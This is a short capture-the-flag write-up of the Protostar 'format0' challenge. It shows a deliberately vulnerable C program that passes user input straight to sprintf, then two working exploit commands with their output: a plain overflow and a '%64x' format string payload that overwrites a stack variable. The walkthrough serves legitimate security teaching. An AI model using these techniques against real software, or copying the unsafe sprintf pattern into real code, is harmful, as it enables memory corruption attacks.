Protostar vm, format0

protostar

Here is the source of the vulnerable program :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void vuln(char *string)
{
  volatile int target;
  char buffer[64];

  target = 0;

  sprintf(buffer, string);
  
  if(target == 0xdeadbeef) {
      printf("you have hit the target correctly :)\n");
  }
}

int main(int argc, char **argv)
{
  vuln(argv[1]);
}

This challenge is about learning the basics of format strings attacks.

First of, let’s note that this code is vulnerable to a simple buffer overflow, and we can use the same trick we used in stack1 :

1
2
3
user@protostar:~$ /opt/protostar/bin/./format0 `python -c 'print 64*"A"+"\xef\xbe\xad\xde"'`
you have hit the target correctly :)
user@protostar:~$

But that’s not really why we’re here, plus the challenge’s webpage tells us that we should only use 10 bytes or less. So let’s dig into format strings attacks.

After some research, I found out that format identifiers can have a minimum field width. This means that you can actually reproduce the buffer overflow used above by padding the buffer with this trick :

1
2
3
user@protostar:~$ /opt/protostar/bin/./format0 `python -c 'print "%64x"+"\xef\xbe\xad\xde"'`
you have hit the target correctly :)
user@protostar:~$